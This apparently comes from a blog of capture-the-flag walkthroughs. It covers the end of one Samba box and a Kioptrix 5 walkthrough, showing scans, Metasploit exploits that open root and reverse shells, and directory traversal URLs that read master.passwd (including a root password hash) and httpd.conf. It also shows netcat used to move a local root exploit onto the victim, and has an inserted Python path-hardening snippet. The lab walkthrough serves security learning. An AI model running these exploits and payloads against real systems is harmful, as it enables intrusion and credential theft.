| Version: 5.7.12-0ubuntu1
| Thread ID: 8
| Capabilities flags: 63487
| Some Capabilities: Speaks41ProtocolOld, Support41Auth, SupportsLoadDataLocal, Speaks41ProtocolNew, LongPassword, DontAllowDatabaseTableColumn, SupportsTransactions, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, InteractiveClient, SupportsCompression, ODBCClient, ConnectWithDatabase, LongColumnFlag, FoundRows, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: P\x01.”{%VMG\x02\x07s6fVY..jf
|_ Auth Plugin Name: 88
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech

enum4linux also finds:

Sharename Type Comment
——— —- ——-
print$ Disk Printer Drivers
kathy Disk Fred, What are we doing here?
tmp Disk All temporary files should be stored here
IPC$ IPC IPC Service (red server (Samba, Ubuntu))

[+] Attempting to map shares on 192.168.31.147
//192.168.31.147/print$ Mapping: DENIED, Listing: N/A
//192.168.31.147/kathy Mapping: OK, Listing: OK
//192.168.31.147/tmp Mapping: OK, Listing: OK

I try the low hanging fruit from my Github page and it's a win.

msf > use exploit/linux/samba/is_known_pipename

msf exploit(linux/samba/is_known_pipename) > setg RHOST 192.168.31.147
RHOST => 192.168.31.147
msf exploit(linux/samba/is_known_pipename) > options

—- ————— ——– ———–
RHOST 192.168.31.147 yes The target address
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory

Exploit target:

Id Name
— —-
0 Automatic (Interact)

msf exploit(linux/samba/is_known_pipename) > set RPORT 139
RPORT => 139
msf exploit(linux/samba/is_known_pipename) > set SMB_SHARE_NAME /tmp
SMB_SHARE_NAME => /tmp
msf exploit(linux/samba/is_known_pipename) > run

[*] 192.168.31.147:139 – Using location \\192.168.31.147\tmp\ for the path
[*] 192.168.31.147:139 – Retrieving the remote path of the share ‘tmp’
[*] 192.168.31.147:139 – Share ‘tmp’ has server-side path ‘/var/tmp
[*] 192.168.31.147:139 – Uploaded payload to \\192.168.31.147\tmp\IQqlqbox.so
[*] 192.168.31.147:139 – Loading the payload from server-side path /var/tmp/IQqlqbox.so using \\PIPE\/var/tmp/IQqlqbox.so…
[-] 192.168.31.147:139 – >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.31.147:139 – Loading the payload from server-side path /var/tmp/IQqlqbox.so using /var/tmp/IQqlqbox.so…
[-] 192.168.31.147:139 – >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.31.147:139 – Uploaded payload to \\192.168.31.147\tmp\IxhxfTZL.so
[*] 192.168.31.147:139 – Loading the payload from server-side path /var/tmp/IxhxfTZL.so using \\PIPE\/var/tmp/IxhxfTZL.so…
[-] 192.168.31.147:139 – >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.31.147:139 – Loading the payload from server-side path /var/tmp/IxhxfTZL.so using /var/tmp/IxhxfTZL.so…
[+] 192.168.31.147:139 – Probe response indicates the interactive payload was loaded…
[*] Found shell.
[*] Command shell session 1 opened (192.168.31.139:40411 -> 192.168.31.147:139) at 2018-02-27 08:32:10 -0500

id
uid=0(root) gid=0(root) groups=0(root)

That was fast, but no pain means no gain.

I upgrade and beautify the shell and print the flag:

python -c 'import pty; pty.spawn("/bin/bash")'


Kioptrix 5 walkthrough

root@kali:~# netdiscover -r 192.168.31.0/24

Currently scanning: Finished! | Screen View: Unique Hosts

4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
—————————————————————————–
192.168.31.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.31.2 00:50:56:e1:a9:71 1 60 VMware, Inc.
192.168.31.146 00:50:56:20:56:e2 1 60 VMware, Inc.
192.168.31.254 00:50:56:f8:bd:9c 1 60 VMware, Inc.

Scanning:

nmap -sT -sV -A -p- 192.168.31.146 -n --open

Starting Nmap 7.50 ( https://nmap.org ) at 2018-02-26 09:05 EST
Nmap scan report for 192.168.31.146
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:50:56:20:56:E2 (VMware)
Device type: general purpose|specialized
Running (JUST GUESSING): FreeBSD 9.X|10.X|7.X|8.X|6.X (93%),
Aggressive OS guesses: FreeBSD 9.0-RELEASE – 10.3-RELEASE (93%), AVtech Room Alert 26W environmental monitor (91%), Linux 2.6.18 – 2.6.22 (90%), FreeBSD 7.0-RELEASE – 9.0-RELEASE (88%), FreeBSD 7.0-RELEASE (87%), FreeBSD 7.1-PRERELEASE 7.2-STABLE (87%), FreeBSD 7.1-RELEASE (87%), FreeBSD 8.0-STABLE (87%), FreeBSD 8.1-RELEASE (86%), FreeBSD 6.2-RELEASE (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

The PHP version and Apache are not useful, because I am too lazy to try all the exploits found.

mod_ssl/2.2.21 related exploits also do not seem to work: there is no HTTPS on the server, and the exploits found (Apache mod_ssl < 2.8.7 OpenSSL – 'OpenFuck.c' Remote Exploit) need SSL.

dirb also finds nothing.

I browse to http://192.168.31.146:80 and view the source. Bingo!

<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">

searchsploit to the rescue:


# Exploit Author: Balazs Makany
# Vendor Homepage: www.pchart.net
# Software Link: www.pchart.net/download
# Google Dork: intitle:”pChart 2.x – examples” intext:”2.1.3″
# Version: 2.1.3
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache)
# CVE : N/A

[1] Directory Traversal:
hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
The traversal is executed with the web server’s privilege and leads to
sensitive file disclosure (passwd, siteconf.inc.php or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server’s configuration.
This problem may exists in the production code if the example code was
copied into the production environment.
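The advisory describes the bug; the fix is to never hand the decoded Script parameter to the file system unchecked. The following is an added Python illustration (not pChart's PHP and not code from this post) that shows the naive join producing the traversal from the advisory's payload and a hardened version that rejects it; the examples directory path and the file name are constructed.

```python
import os
from urllib.parse import unquote

# Assumed examples directory of a pChart install (constructed, not the target's real path).
EXAMPLES_ROOT = "/usr/local/www/apache22/data/pChart2.1.3/examples"


def naive_script_path(script_param, root=EXAMPLES_ROOT):
    """What a handler that simply joins the decoded ?Script= value onto the examples
    directory ends up opening. os.path.join discards `root` as soon as the decoded
    value starts with '/', which the advisory's %2f..%2f..%2f payload does."""
    return os.path.normpath(os.path.join(root, unquote(script_param)))


def safe_script_path(script_param, root=EXAMPLES_ROOT):
    """Hardened form: decode twice (to catch %252e%252e double encoding), refuse NUL
    bytes, resolve the candidate relative to root and accept it only if it stays
    under root and names a .php file. Returns the resolved path or None."""
    decoded = unquote(unquote(script_param))
    if "\x00" in decoded:
        return None
    root_norm = os.path.normpath(root)
    # Treat the parameter as relative to root even if it starts with '/'.
    candidate = os.path.normpath(os.path.join(root_norm, decoded.lstrip("/")))
    if candidate != root_norm and not candidate.startswith(root_norm + os.sep):
        return None  # escaped the examples directory
    if not candidate.endswith(".php"):
        return None  # only example scripts are meant to be viewable
    return candidate


if __name__ == "__main__":
    payload = "%2f..%2f..%2fetc/master.passwd"
    print("naive :", naive_script_path(payload))
    print("safe  :", safe_script_path(payload))
    print("safe  :", safe_script_path("some_example.php"))
```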

We try different customized directory traversal URLs, but they don't work because I treat the host like a Linux system... and it is a FreeBSD one, so file locations are different.

/etc/passwd does not exist. Instead we have:

http://192.168.31.146/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/master.passwd

# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $
#
root:$1$DdHlo6rh$usiPcDoTR37eL7DAyLjhk1:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:

I fail to see that the root user actually has an encrypted password right there and I move along, searching for the equivalent of /etc/shadow, which is /etc/spwd.db; it does not load into the browser when I access:

http://192.168.31.146/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/spwd.db%22

A Google search finds me:

http://192.168.31.146/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>

Which means that if I switch the HTTP User-Agent to Mozilla/4, I might get a different web page.

root@kali:~# curl -H "User-Agent:Mozilla/4.0" http://192.168.31.146:8080/phptax/ | head -n1

<title>PHPTAX by William L. Berggren 2003(c)</title>
100 4125 0 4125 0 0 2014k 0 --:--:-- --:--:-- --:--:-- 2014k
curl: (23) Failed writing body (4067 != 4230)
root@kali:~#

root@kali:~# searchsploit phptax
---------------------------------------------------------- ----------------------------------
 Exploit Title | Path
 | (/usr/share/exploitdb/platforms/)
---------------------------------------------------------- ----------------------------------
PhpTax - pfilez Parameter Exec Remote Code Injection (Met | php/webapps/21833.rb

use exploit/multi/http/phptax_exec
set RHOST 192.168.31.146
set RPORT 8080

msf exploit(multi/http/phptax_exec) > run

[*] Started reverse TCP double handler on 192.168.31.139:4444
[*] 192.168.31.146:8080 – Sending request…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo bPVG3SBi0VbyjPza;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Command: echo RHWVYqnt2WyVvZsH;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “bPVG3SBi0VbyjPza\r\n”
[*] Matching…
[*] A is input…
[*] Reading from socket B
[*] B: “RHWVYqnt2WyVvZsH\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 5 opened (192.168.31.139:4444 -> 192.168.31.146:47858) at 2018-02-26 17:22:01 -0500
[*] Command shell session 6 opened (192.168.31.139:4444 -> 192.168.31.146:56244) at 2018-02-26 17:22:01 -0500

id
uid=80(www) gid=80(www) groups=80(www)

We have a limited shell.

uname -a reminds us that we are running FreeBSD 9.

We copy the exploit:

cp /usr/share/exploitdb/platforms/freebsd/local/28718.c ./

Upload it to the victim machine with nc:

nc -lvvp 8888 < ./28718.c   // sending from the attacking machine

nc -nv 8888 > ./28718.c  // receiving on the victim machine

chmod 777 ./28718.c

We compile and run the exploit:

Congratz to myself. I still feel like a noob.
